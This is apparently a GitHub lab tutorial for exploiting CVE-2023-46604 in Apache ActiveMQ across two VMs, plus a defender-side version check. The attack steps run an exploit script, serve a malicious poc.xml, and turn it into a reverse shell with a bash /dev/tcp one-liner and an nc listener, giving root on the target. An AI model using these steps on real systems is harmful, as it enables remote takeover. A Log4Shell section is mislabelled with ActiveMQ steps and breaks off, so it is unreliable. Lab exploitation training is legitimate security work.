dcm2406 / CVE-Lab

Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604


CVE-2023-46604 Lab

This lab walks through exploiting CVE-2023-46604 in Apache ActiveMQ.

Acknowledgements

Environment

This lab requires two virtual machines: one Kali Linux machine (version 2023.4) and one Ubuntu machine (version 22.04.3 LTS). Download the images from the official Kali Linux and Ubuntu download pages.


Model and system requirements

On the Kali Linux machine:

  • Install git:
    $ sudo apt install git
  • Install gedit:
    $ sudo apt install gedit
  • Python (already available on Kali Linux)
  • Netcat (already available on Kali Linux)

On the Ubuntu machine:

  • Install git:
    $ sudo apt install git
  • Install OpenJDK 18:
    $ sudo apt install openjdk-18-jdk
  • Install the ActiveMQ 5.18.2 package:
    $ sudo su
    $ git clone https://github.com/dcm2406/ApacheActiveMQ
    $ cd ApacheActiveMQ/
    $ tar -xf apache-activemq-5.18.2-bin.tar.gz

Exploiting

Step 1: Launch the ActiveMQ service on the Ubuntu machine

Open a terminal window and run the following commands:

$ sudo su
$ cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$ ./activemq start

Check the status of the service:

$ ./activemq status

If the service started successfully, the terminal shows "ActiveMQ Broker is running".

You can also open http://127.0.0.1:8161 to reach the ActiveMQ broker manager, which shows the hostname, version, ID, uptime and other information.

Step 2: Set up the Kali Linux machine for the attack

Download the resources for the exploitation process:

$ sudo su
$ git clone https://github.com/dcm2406/CVE-2023-46604
$ cd CVE-2023-46604
$ ls

As you can see, there are two files, exploit.py and poc.xml:

  • The poc.xml file contains the malicious payload that abuses the vulnerability in the OpenWire protocol.
  • The exploit.py file is responsible for sending the broker on the target machine a request that points it at the URL of poc.xml.

Start a web server in the resource directory so that poc.xml can be fetched over HTTP:

$ cd CVE-2023-46604
$ python3 -m http.server

Open a new terminal window and use exploit.py to send poc.xml to the target's broker:

$ sudo su
$ cd CVE-2023-46604
$ python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

After the command runs, the Calculator application launches on the target machine, which proves that the vulnerability was exploited successfully. Next, create a reverse shell to control the target machine.

Open a new terminal window to listen for the reverse shell connection:

$ sudo su
$ nc -nlvp 4444

Return to the previous terminal and edit the poc.xml file:

$ gedit poc.xml

Replace the value gnome-calculator with bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 and save the file.

Send the malicious code again:

$ python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

The result of this command is a root shell on the target machine: the shell runs with the privileges of the broker process, which this lab started as root via sudo su.
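A defender-side check, added here and not part of the lab's repository: it extracts the version string that the broker manager page from step 1 displays and compares it against the releases in which Apache fixed CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6 and 5.18.3), so the 5.18.2 build used in this lab is flagged as vulnerable. The HTML fragment is a constructed sample.

```python
import re

# Releases that fixed CVE-2023-46604 on each affected 5.x branch (Apache advisory);
# 6.x is not listed as affected.
FIXED_BY_BRANCH = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(text: str) -> tuple:
    """Return the first dotted version (e.g. 5.18.2) found in free text such as
    the broker manager page or the output of `activemq --version`."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(g) for g in m.groups())


def is_vulnerable_to_cve_2023_46604(version: str) -> bool:
    """True if the given ActiveMQ version falls inside an affected range."""
    major, minor, patch = parse_version(version)
    if major != 5:
        return major < 5          # everything before 5.15.16 is affected; 6.x is not
    if minor < 15:
        return True               # 5.0 .. 5.14 are all older than 5.15.16
    fixed = FIXED_BY_BRANCH.get((major, minor))
    if fixed is None:
        return False              # branches newer than 5.18 are past the fix
    return (major, minor, patch) < fixed


def assess_broker_page(html: str) -> dict:
    """Pull the version out of a broker manager page fragment and classify it."""
    version = ".".join(str(n) for n in parse_version(html))
    return {"version": version,
            "vulnerable": is_vulnerable_to_cve_2023_46604(version)}


# Constructed sample: the kind of fragment the manager page shows for this lab's install.
SAMPLE_MANAGER_HTML = "<td>Version</td><td><b>5.18.2</b></td>"

if __name__ == "__main__":
    print(assess_broker_page(SAMPLE_MANAGER_HTML))
```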

CVE-2021-44228 Lab

Acknowledgements

Environment

This lab requires two virtual machines: one Kali Linux machine (version 2023.4) and one Ubuntu machine (version 22.04.3 LTS). Download the images from the official Kali Linux and Ubuntu download pages.


Model and system requirements

On the Kali Linux machine:

  • git installed:
    $ sudo apt install git
  • gedit installed
  • Python installed
  • Netcat installed

On the Ubuntu machine:

  • git installed
  • OpenJDK 18 installed
  • ActiveMQ 5.18.2 package installed

Exploiting

Step 1: On the Ubuntu machine, launch the ActiveMQ service

Support

For support, email dcm240602@gmail.com or txc3000@gmail.com
